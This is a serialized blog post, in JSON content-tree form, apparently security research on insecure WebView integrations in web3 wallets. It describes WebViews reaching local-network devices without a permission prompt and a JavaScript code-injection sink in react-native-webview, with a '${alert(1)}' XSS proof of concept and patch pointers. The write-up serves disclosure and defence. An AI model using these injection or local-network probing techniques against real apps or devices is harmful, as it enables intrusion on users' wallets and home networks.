gps",{"type":25,"tag":216,"props":162087,"children":162088},{"style":6953},[162089],{"type":31,"value":179},{"type":25,"tag":216,"props":162091,"children":162092},{"style":6947},[162093],{"type":31,"value":38927},{"type":25,"tag":216,"props":162095,"children":162096},{"style":6953},[162097],{"type":31,"value":4983},{"type":25,"tag":216,"props":162099,"children":162100},{"style":8205},[162101],{"type":31,"value":162102},"`Lat: ",{"type":25,"tag":216,"props":162104,"children":162105},{"style":6936},[162106],{"type":31,"value":38071},{"type":25,"tag":216,"props":162108,"children":162109},{"style":6947},[162110],{"type":31,"value":2254},{"type":25,"tag":216,"props":162112,"children":162113},{"style":6953},[162114],{"type":31,"value":179},{"type":25,"tag":216,"props":162116,"children":162117},{"style":6947},[162118],{"type":31,"value":162119},"latitude",{"type":25,"tag":216,"props":162121,"children":162122},{"style":6953},[162123],{"type":31,"value":179},{"type":25,"tag":216,"props":162125,"children":162126},{"style":7047},[162127],{"type":31,"value":162128},"toFixed",{"type":25,"tag":216,"props":162130,"children":162131},{"style":6953},[162132],{"type":31,"value":1850},{"type":25,"tag":216,"props":162134,"children":162135},{"style":6989},[162136],{"type":31,"value":184},{"type":25,"tag":216,"props":162138,"children":162139},{"style":6953},[162140],{"type":31,"value":1888},{"type":25,"tag":216,"props":162142,"children":162143},{"style":6936},[162144],{"type":31,"value":38103},{"type":25,"tag":216,"props":162146,"children":162147},{"style":52342},[162148],{"type":31,"value":52345},{"type":25,"tag":216,"props":162150,"children":162151},{"style":8205},[162152],{"type":31,"value":162153},"Lon: ",{"type":25,"tag":216,"props":162155,"children":162156},{"style":6936},[162157],{"type":31,"value":38071},{"type":25,"tag":216,"props":162159,"children":162160},{"style":6947},[162161],{"type":31,"value":2254},{"type":25,"tag":216,"props":162163,"children":162164},{"style":6953},[162165],{"type":31,"value":179},{"type":25,"tag":216,"props":162167,"children":162168},{"style":6947},[162169],{"type":31,"value":162170},"longitude",{"type":25,"tag":216,"props":162172,"children":162173},{"style":6953},[162174],{"type":31,"value":179},{"type":25,"tag":216,"props":162176,"children":162177},{"style":7047},[162178],{"type":31,"value":162128},{"type":25,"tag":216,"props":162180,"children":162181},{"style":6953},[162182],{"type":31,"value":1850},{"type":25,"tag":216,"props":162184,"children":162185},{"style":6989},[162186],{"type":31,"value":184},{"type":25,"tag":216,"props":162188,"children":162189},{"style":6953},[162190],{"type":31,"value":1888},{"type":25,"tag":216,"props":162192,"children":162193},{"style":6936},[162194],{"type":31,"value":38103},{"type":25,"tag":216,"props":162196,"children":162197},{"style":8205},[162198],{"type":31,"value":14339},{"type":25,"tag":216,"props":162200,"children":162201},{"style":6953},[162202],{"type":31,"value":6967},{"type":25,"tag":216,"props":162204,"children":162205},{"class":6922,"line":27740},[162206,162211,162215,162219,162224,162228,162232],{"type":25,"tag":216,"props":162207,"children":162208},{"style":6953},[162209],{"type":31,"value":162210},"                }, ",{"type":25,"tag":216,"props":162212,"children":162213},{"style":6947},[162214],{"type":31,"value":52389},{"type":25,"tag":216,"props":162216,"children":162217},{"style":6936},[162218],{"type":31,"value":31711},{"type":25,"tag":216,"props":162220,"children":162221},{"style":7047},[162222],{"type":31,"value":162223}," alert",{"type":25,"tag":216,"props":162225,"children":162226},{"style":6953},[162227],{"type":31,"value":1850},{"type":25,"tag":216,"props":162229,"children":162230},{"style":6947},[162231],{"type":31,"value":52389},{"type":25,"tag":216,"props":162233,"children":162234},{"style":6953},[162235],{"type":31,"value":11175},{"type":25,"tag":216,"props":162237,"children":162238},{"class":6922,"line":27777},[162239],{"type":25,"tag":216,"props":162240,"children":162241},{"style":6953},[162242],{"type":31,"value":52043},{"type":25,"tag":216,"props":162244,"children":162245},{"class":6922,"line":27790},[162246],{"type":25,"tag":216,"props":162247,"children":162248},{"emptyLinePlaceholder":16},[162249],{"type":31,"value":7642},{"type":25,"tag":216,"props":162251,"children":162252},{"class":6922,"line":27803},[162253],{"type":25,"tag":216,"props":162254,"children":162255},{"style":6953},[162256],{"type":31,"value":7302},{"type":25,"tag":216,"props":162258,"children":162259},{"class":6922,"line":27816},[162260,162265],{"type":25,"tag":216,"props":162261,"children":162262},{"style":7047},[162263],{"type":31,"value":162264},"        main",{"type":25,"tag":216,"props":162266,"children":162267},{"style":6953},[162268],{"type":31,"value":7633},{"type":25,"tag":216,"props":162270,"children":162271},{"class":6922,"line":27870},[162272,162276,162280],{"type":25,"tag":216,"props":162273,"children":162274},{"style":36338},[162275],{"type":31,"value":36791},{"type":25,"tag":216,"props":162277,"children":162278},{"style":6936},[162279],{"type":31,"value":36378},{"type":25,"tag":216,"props":162281,"children":162282},{"style":36338},[162283],{"type":31,"value":9943},{"type":25,"tag":216,"props":162285,"children":162286},{"class":6922,"line":27879},[162287,162291,162295],{"type":25,"tag":216,"props":162288,"children":162289},{"style":36338},[162290],{"type":31,"value":36392},{"type":25,"tag":216,"props":162292,"children":162293},{"style":6936},[162294],{"type":31,"value":36362},{"type":25,"tag":216,"props":162296,"children":162297},{"style":36338},[162298],{"type":31,"value":9943},{"type":25,"tag":216,"props":162300,"children":162301},{"class":6922,"line":36243},[162302,162306,162310],{"type":25,"tag":216,"props":162303,"children":162304},{"style":36338},[162305],{"type":31,"value":36392},{"type":25,"tag":216,"props":162307,"children":162308},{"style":6936},[162309],{"type":31,"value":36345},{"type":25,"tag":216,"props":162311,"children":162312},{"style":36338},[162313],{"type":31,"value":9943},{"type":25,"tag":630,"props":162315,"children":162316},{"id":8173},[162317],{"type":31,"value":8176},{"type":25,"tag":38,"props":162319,"children":162320},{},[162321],{"type":31,"value":162322},"Unfortunately, there's no simple solution for fixing this vulnerability, as most libraries don't offer an easy to enable feature flag. Each wallet should be mindful of the libraries they use and subsequently manually implement measures to mitigate this.",{"type":25,"tag":38,"props":162324,"children":162325},{},[162326,162328,162334],{"type":31,"value":162327},"A good baseline for patches like this is Metamask. Their patch for React Native WebView can be found ",{"type":25,"tag":162,"props":162329,"children":162332},{"href":162330,"rel":162331},"https://github.com/MetaMask/metamask-mobile/blob/53e205520cd571e84fbb443470a6e3654650bad4/.yarn/patches/%40metamask-react-native-webview-npm-14.5.0-b34fed6d50.patch#L13",[166],[162333],{"type":31,"value":51553},{"type":31,"value":179},{"type":25,"tag":35308,"props":162336,"children":162337},{"style":35310},[162338],{"type":25,"tag":6467,"props":162339,"children":162343},{"src":162340,"alt":162341,"style":162342},"/posts/insecure-webview-integrations/image2.png","Private Network Access desktop prompt","max-height:144px; width:auto; max-width:100%;",[],{"type":25,"tag":38,"props":162345,"children":162346},{},[162347],{"type":31,"value":162348},"However, even with this patch applied, the user experience is suboptimal. Since there's no cache mechanism for preserving the users' choice, various clickjacking scenarios can be instantiated for further tricking the user into a permission approval.",{"type":25,"tag":26,"props":162350,"children":162352},{"id":162351},"local-network-access",[162353],{"type":31,"value":162354},"Local Network Access",{"type":25,"tag":38,"props":162356,"children":162357},{},[162358,162360,162367,162369,162375],{"type":31,"value":162359},"Modern browsers like Chrome have introduced strict protections around access to a user's local network. When a webpage attempts to send requests to servers on the local network or any private IP range, Chrome will prompt the user for explicit permission before allowing the request to proceed. This is part of the ",{"type":25,"tag":162,"props":162361,"children":162364},{"href":162362,"rel":162363},"https://wicg.github.io/private-network-access/",[166],[162365],{"type":31,"value":162366},"Private Network Access",{"type":31,"value":162368}," specification, and the permission prompt is deliberately restricted to secure contexts (HTTPS) to prevent insecure pages from using local network access as a stepping stone to more serious attacks like remote code execution. There are numerous examples available online detailing the implications of these protections ",{"type":25,"tag":162,"props":162370,"children":162373},{"href":162371,"rel":162372},"https://x.com/taviso/status/2051310678800253318",[166],[162374],{"type":31,"value":162371},{"type":31,"value":162376},". Google's Chrome was one of the first browsers to implement this protection on their desktop application.",{"type":25,"tag":35308,"props":162378,"children":162379},{"style":35310},[162380],{"type":25,"tag":6467,"props":162381,"children":162384},{"src":162382,"alt":162341,"style":162383},"/posts/insecure-webview-integrations/image3.png","max-height:240px; width:auto; max-width:100%;",[],{"type":25,"tag":38,"props":162386,"children":162387},{},[162388],{"type":31,"value":162389},"WebViews, however, do not enforce this restriction. When a dApp is loaded inside a wallet's WebView, it can freely send requests to any host on the user's local network, including routers, NAS devices, smart home hubs, IP cameras, or any other IoT device without triggering any permission prompt whatsoever. The user has no visibility into this happening. See an example of this below.",{"type":25,"tag":162391,"props":162392,"children":162395},"zoom-image",{"src":162393,"alt":162394},"/posts/insecure-webview-integrations/image4.png","Private Network Access demo",[],{"type":25,"tag":38,"props":162397,"children":162398},{},[162399],{"type":31,"value":162400},"The consequences can increase the impact of certain issues. Local network devices are frequently unpatched, rely on default credentials, and expose administrative interfaces that were never designed to be reachable from an external webpage. An attacker-controlled dApp could:",{"type":25,"tag":2039,"props":162402,"children":162403},{},[162404,162409,162414],{"type":25,"tag":2043,"props":162405,"children":162406},{},[162407],{"type":31,"value":162408},"Exfiltrate device information from admin panels or unauthenticated API endpoints exposed by routers or IoT devices.",{"type":25,"tag":2043,"props":162410,"children":162411},{},[162412],{"type":31,"value":162413},"Perform authenticated actions against devices that rely on network-locality as their only access control (a common pattern in consumer IoT).",{"type":25,"tag":2043,"props":162415,"children":162416},{},[162417],{"type":31,"value":162418},"Exploit known CVEs in firmware by sending crafted requests to a device whose vulnerability is already public, potentially achieving remote code execution on that device.",{"type":25,"tag":38,"props":162420,"children":162421},{},[162422],{"type":31,"value":162423},"A user who has installed a reputable web3 wallet has no reason to suspect that browsing via a malicious dApp within that wallet could result in their home devices being probed.",{"type":25,"tag":26,"props":162425,"children":162427},{"id":162426},"uxss-by-code-injection",[162428],{"type":31,"value":162429},"UXSS by Code Injection",{"type":25,"tag":38,"props":162431,"children":162432},{},[162433,162435,162441],{"type":31,"value":162434},"Another sink we found in react-native-webview by just skimming through the code was how the ",{"type":25,"tag":82,"props":162436,"children":162438},{"className":162437},[],[162439],{"type":31,"value":162440},"injectJavascriptObject",{"type":31,"value":162442}," attribute worked. Here is the code snippet:",{"type":25,"tag":206,"props":162444,"children":162446},{"className":160682,"code":162445,"language":160684,"meta":7,"style":7},"    private void injectJavascriptObject() {\n      if (getSettings().getJavaScriptEnabled()) {\n        String js = \"(function(){\\n\" +\n          \"    window.\" + JAVASCRIPT_INTERFACE + \" = window.\" + JAVASCRIPT_INTERFACE + \" || {};\\n\" +\n          \"    window.\" + JAVASCRIPT_INTERFACE + \".injectedObjectJson = function () { return \" + (injectedJavaScriptObject == null ? null : (\"`\" + injectedJavaScriptObject + \"`\")) + \"; };\\n\" +\n          \"})();\";\n        evaluateJavascriptWithFallback(js);\n      }\n",[162447],{"type":25,"tag":82,"props":162448,"children":162449},{"__ignoreMap":7},[162450,162470,162499,162533,162588,162693,162705,162718],{"type":25,"tag":216,"props":162451,"children":162452},{"class":6922,"line":6923},[162453,162457,162461,162466],{"type":25,"tag":216,"props":162454,"children":162455},{"style":6936},[162456],{"type":31,"value":74753},{"type":25,"tag":216,"props":162458,"children":162459},{"style":7375},[162460],{"type":31,"value":55018},{"type":25,"tag":216,"props":162462,"children":162463},{"style":7047},[162464],{"type":31,"value":162465}," injectJavascriptObject",{"type":25,"tag":216,"props":162467,"children":162468},{"style":6964},[162469],{"type":31,"value":19694},{"type":25,"tag":216,"props":162471,"children":162472},{"class":6922,"line":6769},[162473,162477,162481,162486,162490,162495],{"type":25,"tag":216,"props":162474,"children":162475},{"style":6973},[162476],{"type":31,"value":43250},{"type":25,"tag":216,"props":162478,"children":162479},{"style":6964},[162480],{"type":31,"value":7016},{"type":25,"tag":216,"props":162482,"children":162483},{"style":7047},[162484],{"type":31,"value":162485},"getSettings",{"type":25,"tag":216,"props":162487,"children":162488},{"style":6964},[162489],{"type":31,"value":34129},{"type":25,"tag":216,"props":162491,"children":162492},{"style":7047},[162493],{"type":31,"value":162494},"getJavaScriptEnabled",{"type":25,"tag":216,"props":162496,"children":162497},{"style":6964},[162498],{"type":31,"value":95992},{"type":25,"tag":216,"props":162500,"children":162501},{"class":6922,"line":6778},[162502,162507,162512,162516,162521,162525,162529],{"type":25,"tag":216,"props":162503,"children":162504},{"style":7375},[162505],{"type":31,"value":162506},"        String",{"type":25,"tag":216,"props":162508,"children":162509},{"style":6947},[162510],{"type":31,"value":162511}," js",{"type":25,"tag":216,"props":162513,"children":162514},{"style":6953},[162515],{"type":31,"value":6956},{"type":25,"tag":216,"props":162517,"children":162518},{"style":8205},[162519],{"type":31,"value":162520}," \"(function(){",{"type":25,"tag":216,"props":162522,"children":162523},{"style":52342},[162524],{"type":31,"value":52345},{"type":25,"tag":216,"props":162526,"children":162527},{"style":8205},[162528],{"type":31,"value":24020},{"type":25,"tag":216,"props":162530,"children":162531},{"style":6953},[162532],{"type":31,"value":13744},{"type":25,"tag":216,"props":162534,"children":162535},{"class":6922,"line":7005},[162536,162541,162545,162550,162554,162559,162563,162567,162571,162576,162580,162584],{"type":25,"tag":216,"props":162537,"children":162538},{"style":8205},[162539],{"type":31,"value":162540},"          \"    window.\"",{"type":25,"tag":216,"props":162542,"children":162543},{"style":6953},[162544],{"type":31,"value":12858},{"type":25,"tag":216,"props":162546,"children":162547},{"style":6964},[162548],{"type":31,"value":162549}," JAVASCRIPT_INTERFACE ",{"type":25,"tag":216,"props":162551,"children":162552},{"style":6953},[162553],{"type":31,"value":3539},{"type":25,"tag":216,"props":162555,"children":162556},{"style":8205},[162557],{"type":31,"value":162558}," \" = window.\"",{"type":25,"tag":216,"props":162560,"children":162561},{"style":6953},[162562],{"type":31,"value":12858},{"type":25,"tag":216,"props":162564,"children":162565},{"style":6964},[162566],{"type":31,"value":162549},{"type":25,"tag":216,"props":162568,"children":162569},{"style":6953},[162570],{"type":31,"value":3539},{"type":25,"tag":216,"props":162572,"children":162573},{"style":8205},[162574],{"type":31,"value":162575}," \" || {};",{"type":25,"tag":216,"props":162577,"children":162578},{"style":52342},[162579],{"type":31,"value":52345},{"type":25,"tag":216,"props":162581,"children":162582},{"style":8205},[162583],{"type":31,"value":24020},{"type":25,"tag":216,"props":162585,"children":162586},{"style":6953},[162587],{"type":31,"value":13744},{"type":25,"tag":216,"props":162589,"children":162590},{"class":6922,"line":7110},[162591,162595,162599,162603,162607,162612,162616,162621,162625,162629,162633,162637,162641,162645,162650,162654,162659,162663,162668,162672,162676,162681,162685,162689],{"type":25,"tag":216,"props":162592,"children":162593},{"style":8205},[162594],{"type":31,"value":162540},{"type":25,"tag":216,"props":162596,"children":162597},{"style":6953},[162598],{"type":31,"value":12858},{"type":25,"tag":216,"props":162600,"children":162601},{"style":6964},[162602],{"type":31,"value":162549},{"type":25,"tag":216,"props":162604,"children":162605},{"style":6953},[162606],{"type":31,"value":3539},{"type":25,"tag":216,"props":162608,"children":162609},{"style":8205},[162610],{"type":31,"value":162611}," \".injectedObjectJson = function () { return \"",{"type":25,"tag":216,"props":162613,"children":162614},{"style":6953},[162615],{"type":31,"value":12858},{"type":25,"tag":216,"props":162617,"children":162618},{"style":6964},[162619],{"type":31,"value":162620}," (injectedJavaScriptObject ",{"type":25,"tag":216,"props":162622,"children":162623},{"style":6953},[162624],{"type":31,"value":12528},{"type":25,"tag":216,"props":162626,"children":162627},{"style":6936},[162628],{"type":31,"value":74239},{"type":25,"tag":216,"props":162630,"children":162631},{"style":6973},[162632],{"type":31,"value":101999},{"type":25,"tag":216,"props":162634,"children":162635},{"style":6936},[162636],{"type":31,"value":74239},{"type":25,"tag":216,"props":162638,"children":162639},{"style":6973},[162640],{"type":31,"value":39079},{"type":25,"tag":216,"props":162642,"children":162643},{"style":6964},[162644],{"type":31,"value":7016},{"type":25,"tag":216,"props":162646,"children":162647},{"style":8205},[162648],{"type":31,"value":162649},"\"`\"",{"type":25,"tag":216,"props":162651,"children":162652},{"style":6953},[162653],{"type":31,"value":12858},{"type":25,"tag":216,"props":162655,"children":162656},{"style":6964},[162657],{"type":31,"value":162658}," injectedJavaScriptObject ",{"type":25,"tag":216,"props":162660,"children":162661},{"style":6953},[162662],{"type":31,"value":3539},{"type":25,"tag":216,"props":162664,"children":162665},{"style":8205},[162666],{"type":31,"value":162667}," \"`\"",{"type":25,"tag":216,"props":162669,"children":162670},{"style":6964},[162671],{"type":31,"value":12790},{"type":25,"tag":216,"props":162673,"children":162674},{"style":6953},[162675],{"type":31,"value":3539},{"type":25,"tag":216,"props":162677,"children":162678},{"style":8205},[162679],{"type":31,"value":162680}," \"; };",{"type":25,"tag":216,"props":162682,"children":162683},{"style":52342},[162684],{"type":31,"value":52345},{"type":25,"tag":216,"props":162686,"children":162687},{"style":8205},[162688],{"type":31,"value":24020},{"type":25,"tag":216,"props":162690,"children":162691},{"style":6953},[162692],{"type":31,"value":13744},{"type":25,"tag":216,"props":162694,"children":162695},{"class":6922,"line":7216},[162696,162701],{"type":25,"tag":216,"props":162697,"children":162698},{"style":8205},[162699],{"type":31,"value":162700},"          \"})();\"",{"type":25,"tag":216,"props":162702,"children":162703},{"style":6964},[162704],{"type":31,"value":6967},{"type":25,"tag":216,"props":162706,"children":162707},{"class":6922,"line":7244},[162708,162713],{"type":25,"tag":216,"props":162709,"children":162710},{"style":7047},[162711],{"type":31,"value":162712},"        evaluateJavascriptWithFallback",{"type":25,"tag":216,"props":162714,"children":162715},{"style":6964},[162716],{"type":31,"value":162717},"(js);\n",{"type":25,"tag":216,"props":162719,"children":162720},{"class":6922,"line":7257},[162721],{"type":25,"tag":216,"props":162722,"children":162723},{"style":6964},[162724],{"type":31,"value":16620},{"type":25,"tag":38,"props":162726,"children":162727},{},[162728,162730,162736,162738,162743,162745,162751],{"type":31,"value":162729},"It basically injects a javascript code with the ",{"type":25,"tag":82,"props":162731,"children":162733},{"className":162732},[],[162734],{"type":31,"value":162735},"injectedJavascriptObject",{"type":31,"value":162737}," wrapped by backticks (`). If you are familiar with javascript, you can immediately see that this enables code injection if we partially control ",{"type":25,"tag":82,"props":162739,"children":162741},{"className":162740},[],[162742],{"type":31,"value":162735},{"type":31,"value":162744},". If we control a single attribute we can inject a payload like ",{"type":25,"tag":82,"props":162746,"children":162748},{"className":162747},[],[162749],{"type":31,"value":162750},"${alert(1)}",{"type":31,"value":162752}," and achieve XSS in the context of the loaded page.",{"type":25,"tag":38,"props":162754,"children":162755},{},[162756,162758,162765],{"type":31,"value":162757},"Then, when scrolling through the open PRs, we saw that there is one that fixes exactly this problem, though we were not the first ones to find it (that's ok, it is a pretty easy bug to find). Here is the ",{"type":25,"tag":162,"props":162759,"children":162762},{"href":162760,"rel":162761},"https://github.com/react-native-webview/react-native-webview/pull/3929/changes",[166],[162763],{"type":31,"value":162764},"PR with the report and fix",{"type":31,"value":179},{"type":25,"tag":38,"props":162767,"children":162768},{},[162769],{"type":31,"value":162770},"The vulnerability is still in the code since the PR has not been merged yet and, since the PR is public, everyone can see the bug. This is indeed the library's fault, but tells us that another thing to keep an eye on is unmerged PRs that fix vulnerabilities. Ideally, an open source library should have a security policy with a contact method so security researchers can report vulnerabilities without making them public. This is because once it is public, more people acknowledge the bug and it is more likely to be exploited in the wild.",{"type":25,"tag":38,"props":162772,"children":162773},{},[162774,162776,162782],{"type":31,"value":162775},"If you want to see if your application is vulnerable, you can simply check if you are injecting ",{"type":25,"tag":82,"props":162777,"children":162779},{"className":162778},[],[162780],{"type":31,"value":162781},"injectedJavaScriptObject",{"type":31,"value":162783}," with some user-provided input, if so, it is recommended to manually merge the PR and rebuild your application with the patched library.",{"type":25,"tag":606,"props":162785,"children":162786},{"id":32892},[162787],{"type":31,"value":22907},{"type":25,"tag":38,"props":162789,"children":162790},{},[162791],{"type":31,"value":162792},"Most WebView articles focus on classic URL spoofing. In wallet apps, the more interesting problems usually come from capability inheritance: a WebView quietly benefits from permissions granted to the host app and small integration assumptions turn into serious impact.",{"type":25,"tag":9316,"props":162794,"children":162795},{},[162796],{"type":31,"value":9320},{"title":7,"searchDepth":6769,"depth":6769,"links":162798},[162799,162803,162806,162807],{"id":160522,"depth":6769,"text":160525,"children":162800},[162801,162802],{"id":160533,"depth":6778,"text":160536},{"id":160608,"depth":6778,"text":160611},{"id":160641,"depth":6769,"text":160644,"children":162804},[162805],{"id":160831,"depth":6778,"text":160834},{"id":162351,"depth":6769,"text":162354},{"id":162426,"depth":6769,"text":162429,"children":162808},[162809],{"id":32892,"depth":6778,"text":22907},"content:blog:2026-06-18-goldmine-of-insecure-webview-integrations.md","blog/2026-06-18-goldmine-of-insecure-webview-integrations.md","blog/2026-06-18-goldmine-of-insecure-webview-integrations",{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":9,"date":10,"author":11,"image":162814,"isFeatured":16,"onBlogPage":16,"tags":162815,"hideToc":16,"body":162816,"_type":6798,"_id":6799,"_source":6800,"_file":6801,"_stem":6802,"_extension":6803},{"src":13,"width":14,"height":15},[18,19,20],{"type":22,"children":162817,"toc":168964},[162818,162822,162829,162833,162837,162841,162850,162854,162864,162878,162882,162891,162901,162905,162929,162932,162942,162946,163126,163130,163134,163143,163147,163151,163155,163165,163191,163195,163198,163208,163211,163227,163234,163244,163247,163257,163261,163270,163274,163278,163294,163301,163304,163332,163335,163363,163366,163370,163373,163381,163409,163412,163422,163426,163430,163452,163459,163462,163483,163486,163490,163811,163815,163818,163833,163855,163858,163868,163878,163881,163885,163889,163893,163897,163907,163911,163915,163937,163964,163974,163977,163981,163984,163988,164150,164178,164182,164185,164189,164374,164384,164388,164391,164407,164411,164415,164419,164423,164433,164436,164440,164444,164448,164452,164456,164460,164470,164497,164501,167035,167299,167303,168608,168612,168615,168624,168711,168720,168724,168728,168732,168738,168742,168748,168752,168778,168787,168793,168797,168801,168805,168811,168815,168819,168825,168835,168839,168843,168847,168856,168860,168864,168868,168872,168876,168880,168883,168887,168890,168894,168898,168907,168911,168915],{"type":25,"tag":26,"props":162819,"children":162820},{"id":28},[162821],{"type":31,"value":32},{"type":25,"tag":34,"props":162823,"children":162824},{},[162825],{"type":25,"tag":38,"props":162826,"children":162827},{},[162828],{"type":31,"value":42},{"type":25,"tag":38,"props":162830,"children":162831},{},[162832],{"type":31,"value":47},{"type":25,"tag":26,"props":162834,"children":162835},{"id":18},[162836],{"type":31,"value":52},{"type":25,"tag":38,"props":162838,"children":162839},{},[162840],{"type":31,"value":57},{"type":25,"tag":38,"props":162842,"children":162843},{},[162844,162845,162849],{"type":31,"value":62},{"type":25,"tag":64,"props":162846,"children":162847},{},[162848],{"type":31,"value":68},{"type":31,"value":70},{"type":25,"tag":38,"props":162851,"children":162852},{},[162853],{"type":31,"value":75},{"type":25,"tag":38,"props":162855,"children":162856},{},[162857,162858,162863],{"type":31,"value":80},{"type":25,"tag":82,"props":162859,"children":162861},{"className":162860},[],[162862],{"type":31,"value":87},{"type":31,"value":89},{"type":25,"tag":38,"props":162865,"children":162866},{},[162867,162868,162872,162873,162877],{"type":31,"value":94},{"type":25,"tag":64,"props":162869,"children":162870},{},[162871],{"type":31,"value":99},{"type":31,"value":101},{"type":25,"tag":64,"props":162874,"children":162875},{},[162876],{"type":31,"value":106},{"type":31,"value":108},{"type":25,"tag":26,"props":162879,"children":162880},{"id":111},[162881],{"type":31,"value":114},{"type":25,"tag":38,"props":162883,"children":162884},{},[162885,162886,162890],{"type":31,"value":119},{"type":25,"tag":64,"props":162887,"children":162888},{},[162889],{"type":31,"value":124},{"type":31,"value":126},{"type":25,"tag":38,"props":162892,"children":162893},{},[162894,162895,162900],{"type":31,"value":131},{"type":25,"tag":82,"props":162896,"children":162898},{"className":162897},[],[162899],{"type":31,"value":137},{"type":31,"value":139},{"type":25,"tag":38,"props":162902,"children":162903},{},[162904],{"type":31,"value":144},{"type":25,"tag":146,"props":162906,"children":162907},{},[162908],{"type":25,"tag":38,"props":162909,"children":162910},{},[162911,162912,162916,162917,162922,162923,162928],{"type":31,"value":153},{"type":25,"tag":64,"props":162913,"children":162914},{},[162915],{"type":31,"value":158},{"type":31,"value":160},{"type":25,"tag":162,"props":162918,"children":162920},{"href":164,"rel":162919},[166],[162921],{"type":31,"value":169},{"type":31,"value":171},{"type":25,"tag":82,"props":162924,"children":162926},{"className":162925},[],[162927],{"type":31,"value":177},{"type":31,"value":179},{"type":25,"tag":181,"props":162930,"children":162931},{"addr":183,"line-start":184,"line-end":185},[],{"type":25,"tag":38,"props":162933,"children":162934},{},[162935,162936,162941],{"type":31,"value":191},{"type":25,"tag":82,"props":162937,"children":162939},{"className":162938},[],[162940],{"type":31,"value":197},{"type":31,"value":199},{"type":25,"tag":38,"props":162943,"children":162944},{},[162945],{"type":31,"value":204},{"type":25,"tag":206,"props":162947,"children":162948},{},[162949],{"type":25,"tag":82,"props":162950,"children":162952},{"className":162951},[212,213],[162953],{"type":25,"tag":216,"props":162954,"children":162956},{"className":162955},[219],[162957],{"type":25,"tag":216,"props":162958,"children":162960},{"className":162959},[224],[162961],{"type":25,"tag":216,"props":162962,"children":162964},{"className":162963,"ariaHidden":230},[229],[162965,162995],{"type":25,"tag":216,"props":162966,"children":162968},{"className":162967},[235],[162969,162973,162982,162986,162991],{"type":25,"tag":216,"props":162970,"children":162972},{"className":162971,"style":241},[240],[],{"type":25,"tag":216,"props":162974,"children":162976},{"className":162975},[246,31],[162977],{"type":25,"tag":216,"props":162978,"children":162980},{"className":162979},[246],[162981],{"type":31,"value":253},{"type":25,"tag":216,"props":162983,"children":162985},{"className":162984,"style":258},[257],[],{"type":25,"tag":216,"props":162987,"children":162989},{"className":162988},[263],[162990],{"type":31,"value":266},{"type":25,"tag":216,"props":162992,"children":162994},{"className":162993,"style":258},[257],[],{"type":25,"tag":216,"props":162996,"children":162998},{"className":162997},[235],[162999,163003],{"type":25,"tag":216,"props":163000,"children":163002},{"className":163001,"style":278},[240],[],{"type":25,"tag":216,"props":163004,"children":163006},{"className":163005},[246],[163007,163011,163122],{"type":25,"tag":216,"props":163008,"children":163010},{"className":163009},[287,288],[],{"type":25,"tag":216,"props":163012,"children":163014},{"className":163013},[293],[163015],{"type":25,"tag":216,"props":163016,"children":163018},{"className":163017},[298,299],[163019,163111],{"type":25,"tag":216,"props":163020,"children":163022},{"className":163021},[304],[163023,163106],{"type":25,"tag":216,"props":163024,"children":163026},{"className":163025,"style":310},[309],[163027,163065,163076],{"type":25,"tag":216,"props":163028,"children":163029},{"style":314},[163030,163034],{"type":25,"tag":216,"props":163031,"children":163033},{"className":163032,"style":320},[319],[],{"type":25,"tag":216,"props":163035,"children":163037},{"className":163036},[246],[163038,163043,163047,163052,163056],{"type":25,"tag":216,"props":163039,"children":163041},{"className":163040},[246],[163042],{"type":31,"value":331},{"type":25,"tag":216,"props":163044,"children":163046},{"className":163045,"style":335},[257],[],{"type":25,"tag":216,"props":163048,"children":163050},{"className":163049},[340],[163051],{"type":31,"value":343},{"type":25,"tag":216,"props":163053,"children":163055},{"className":163054,"style":335},[257],[],{"type":25,"tag":216,"props":163057,"children":163059},{"className":163058},[246,31],[163060],{"type":25,"tag":216,"props":163061,"children":163063},{"className":163062},[246],[163064],{"type":31,"value":357},{"type":25,"tag":216,"props":163066,"children":163067},{"style":360},[163068,163072],{"type":25,"tag":216,"props":163069,"children":163071},{"className":163070,"style":320},[319],[],{"type":25,"tag":216,"props":163073,"children":163075},{"className":163074,"style":370},[369],[],{"type":25,"tag":216,"props":163077,"children":163078},{"style":374},[163079,163083],{"type":25,"tag":216,"props":163080,"children":163082},{"className":163081,"style":320},[319],[],{"type":25,"tag":216,"props":163084,"children":163086},{"className":163085},[246],[163087,163092,163101],{"type":25,"tag":216,"props":163088,"children":163090},{"className":163089},[246],[163091],{"type":31,"value":389},{"type":25,"tag":216,"props":163093,"children":163095},{"className":163094},[246,31],[163096],{"type":25,"tag":216,"props":163097,"children":163099},{"className":163098},[246],[163100],{"type":31,"value":399},{"type":25,"tag":216,"props":163102,"children":163104},{"className":163103},[246],[163105],{"type":31,"value":389},{"type":25,"tag":216,"props":163107,"children":163109},{"className":163108},[408],[163110],{"type":31,"value":411},{"type":25,"tag":216,"props":163112,"children":163114},{"className":163113},[304],[163115],{"type":25,"tag":216,"props":163116,"children":163118},{"className":163117,"style":419},[309],[163119],{"type":25,"tag":216,"props":163120,"children":163121},{},[],{"type":25,"tag":216,"props":163123,"children":163125},{"className":163124},[427,288],[],{"type":25,"tag":26,"props":163127,"children":163128},{"id":431},[163129],{"type":31,"value":434},{"type":25,"tag":38,"props":163131,"children":163132},{},[163133],{"type":31,"value":439},{"type":25,"tag":38,"props":163135,"children":163136},{},[163137,163138,163142],{"type":31,"value":444},{"type":25,"tag":64,"props":163139,"children":163140},{},[163141],{"type":31,"value":449},{"type":31,"value":451},{"type":25,"tag":453,"props":163144,"children":163145},{"id":455},[163146],{"type":31,"value":458},{"type":25,"tag":38,"props":163148,"children":163149},{},[163150],{"type":31,"value":463},{"type":25,"tag":26,"props":163152,"children":163153},{"id":466},[163154],{"type":31,"value":469},{"type":25,"tag":38,"props":163156,"children":163157},{},[163158,163159,163164],{"type":31,"value":474},{"type":25,"tag":162,"props":163160,"children":163162},{"href":477,"rel":163161},[166],[163163],{"type":31,"value":481},{"type":31,"value":483},{"type":25,"tag":38,"props":163166,"children":163167},{},[163168,163169,163178,163179,163184,163185,163190],{"type":31,"value":488},{"type":25,"tag":162,"props":163170,"children":163172},{"href":491,"rel":163171},[166],[163173],{"type":25,"tag":82,"props":163174,"children":163176},{"className":163175},[],[163177],{"type":31,"value":499},{"type":31,"value":501},{"type":25,"tag":82,"props":163180,"children":163182},{"className":163181},[],[163183],{"type":31,"value":507},{"type":31,"value":509},{"type":25,"tag":82,"props":163186,"children":163188},{"className":163187},[],[163189],{"type":31,"value":515},{"type":31,"value":517},{"type":25,"tag":38,"props":163192,"children":163193},{},[163194],{"type":31,"value":522},{"type":25,"tag":524,"props":163196,"children":163197},{"path":526},[],{"type":25,"